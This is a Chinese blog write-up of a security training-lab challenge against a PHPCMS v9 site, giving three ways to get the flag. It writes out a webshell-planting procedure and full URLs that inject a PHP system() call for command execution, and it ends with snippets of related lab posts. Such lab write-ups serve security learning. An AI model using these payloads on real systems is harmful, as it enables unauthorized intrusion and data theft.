墨者学院—CMS系统漏洞分析溯源(第2题)—3种解法详细介绍

最新推荐文章于 2021-07-04 18:48:55 发布
最新推荐文章于 2021-07-04 18:48:55 发布
阅读量807 收藏 1
点赞数
分类专栏: # 墨者学院 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/109052222
版权
本文详细介绍了三种方法利用CMS系统漏洞获取后台文件信息:一是通过一句话木马连接,二是利用远程执行命令,三是平台漏洞直接查看。涉及的关键步骤包括探测网址、发现CMS版本、构造查询命令、文件修改与查杀等。对于不同版本的工具连接问题,建议尝试更换版本。同时,文中感谢@臭nana的帮助。
摘要由CSDN通过智能技术生成

解法一

解题方法:
使用一句话木马进行连接
操作步骤:
1.对网址进行探测
在这里插入图片描述

2.发现后台版本文件robots.txt
在这里插入图片描述

发现CMS为 PHPCMS v9
后台登录页面为 admin.php
3.浏览
在这里插入图片描述

自动填入密码
浏览源码可以发现密码为:I@vH@U$9n8*
也可以将源码中密码的字段名由password改为text
在这里插入图片描述

4.查看是否与墨者学院-CMS系统漏洞分析溯源(第7题)存在相同的文件上传漏洞

原文回顾:https://blog.csdn.net/ploto_cs/article/details/108879574

在这里插入图片描述
在这里插入图片描述

文件注入点位于上传处
在这里插入图片描述

jpg格式能够正常上传
在这里插入图片描述

Php始终被拦截,多次试验发现除图片格式的其他格式均被拦截,放弃该处
5.发现在界面—模板风格—详细列表—search—index.html发现文件可以修改可以添加一句话木马
在这里插入图片描述

添加一句话后 保存文件
6.这时木马就已经成功写入在index.html中
注:
此时的链接地址为((不要写错了):

http://219.153.49.228:44865/index.php?m=search

在这里插入图片描述

成功填写信息后即可获取后台文件
在这里插入图片描述

注:一些版本的菜刀还有蚁剑都不能成功连接,可以尝试更换版本再进行连接
感谢@臭nana大佬的援助

原文链接:
https://blog.csdn.net/weixin_43784056/article/details/85062972?biz_id=102&utm_term=CMS%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%BA%AF%E6%BA%90%E7%AC%AC2%E9%A2%98&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-7-85062972&spm=1018.2118.3001.4187

解法二

解题方法:
利用远程执行命令漏洞
操作步骤:
前面与解法一相同,都得成功登录后台
1.在URL中构造 查询命令
命令:

http://219.153.49.228:48673/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

在这里插入图片描述
可以看到包含key的文件出现,在使用命令打开文件
2.在URL中构造 查看key文件的命令
命令:

http://219.153.49.228:48673/index.php?0=cat key_418204667443.php&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

注:第二条命令中除了修改自己的ip时,还得把注意修改key_xxx.php文件,每个人的key不同
修改成功后,进入网址,再查看源代码,就可以看到密钥值了
在这里插入图片描述

解法三

实验方法:
我觉得算是平台漏洞,可以直接看到文件信息
操作步骤:
前面步骤与解法一相同,成功登录后台后
1.在扩展—木马查杀中
可以通过直接修改特征代码,查询key值
在这里插入图片描述
在这里插入图片描述

2.勾选key文件后提交扫描就可以在查杀报告中查看文件详细内容
在这里插入图片描述
在这里插入图片描述

网络信息安全—ploto
再次鸣谢@臭nana大佬的援助

CMS系统漏洞分析溯源(第2)
weixin_50698958的博客
10-06 389
靶场: https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解思路: 1、打开靶场,首
详细--CMS系统漏洞分析溯源(第2)
weixin_44537595的博客
09-29 288
CMS系统漏洞分析溯源(第2) 访问网站 在访问robots.txt或者扫目录都可以,发现有后台 直接访问admin.php 在木马查杀处,可以对应的特征码进行读取问价内容 如下 找到特征码 完成实验
墨者 - CMS系统漏洞分析溯源(第2)
吃肉唐僧的博客
07-19 589
上网搜索发现,phpcms框架登录后台的默认入口是/index.php?m=admin 发现后台地址 登录系统,摸索一番 发现木马查杀可以查询系统文件 特征密码输入mozhe,遍历所有文件 发现,并且点击打开访问 ...
墨者学院-CMS系统漏洞分析溯源(第2)
臭nana的博客
12-18 728
robots.txt爬下目录,发现admin.php 进入发现账号密码已经填好, 登录进去,界面->模板风格->详细列表->search->index.html(修改)写入一句话后保存 然后从主页访问搜索页面 菜刀连接,拿到key ​...
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 842
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 691
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1625
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?>   判断如果没有admin_na...
墨者学院_CMS系统漏洞分析溯源(第4)
weixin_50698958的博客
10-10 862
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 997
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者靶场 中级:CMS系统漏洞分析溯源(第2
qq_43233085的博客
01-17 815
墨者靶场 中级:CMS系统漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解...
墨者学院 - CMS系统漏洞分析溯源(第2)
多崎巡礼的博客
08-06 1378
登陆后台。 使用admin.php就可以进入后台 用户名密码都是自动填上的,直接登陆就可以。 界面->模板风格->详细列表->search->index.html->将一句话木马添加进去后保存。      ...
墨者学院-编辑器漏洞分析溯源(第2)
a519395243的博客
01-12 768
首先 win10 下可以打开的,用IE 8打开的,其他人说打不开的,可以IE 按F12换版本 找到后台 IP/admin_login.asp 帐号admin  密码 8583213p 点击样式管理下的新增样式 图片类型 cer (IIS6.0平台解析为asp执行),名称随便填,用绝对路径 保存后返回,点击工具后,新增,按钮设置 加插入或修改图片,保存 返回,点击预览,上面操作全在win10 谷歌浏...
墨者学院-CMS系统漏洞分析溯源(第5)
JimWu的博客
09-04 395
CMS系统漏洞分析溯源(第5) 难易程度:★★★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先用御剑扫一下。 发现后台地址/admin。 2.按F12,在cookie editor中添加一个Name=admin_name,value值随机。 3.访问/admin,截包可以看到cookie中已经添加了admin_name=admin。 4...
墨者学院-CMS系统漏洞分析溯源(第3)
臭nana的博客
12-18 478
点击注册,其他地方随便填,除了密码问上填上 ┼攠數畣整爠煥敵瑳∨≡┩愾(一句话的unicode加密)详解:https://www.jianshu.com/p/b48845cf08b8?tdsourcetag=s_pcqq_aiomsg 之前百度的cms新云问吧的漏洞上第一篇文章的一句马是错的,结果重新注册又得7200秒,没办法,只好关了重新开 第二次上传成功,底部出现这提示 默认数据库...
墨者学院-CMS系统漏洞分析溯源(第9)
ploto_cs的博客
10-15 812
一.解思路 查询版本,直接使用工具破解 二.操作步骤 1.浏览网址 可以看到版本号为Discuz 7.2 2.利用工具查看是否存在漏洞 使用工具dz7.x_faq.py 源码为: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf-8 -*- # author iswin import sys import hashlib import time import math import base64 import
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 835
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本墨者学院在线靶场 进入目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
最新发布
12-15
墨者学院的Windows硬盘文件分析取证是一通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值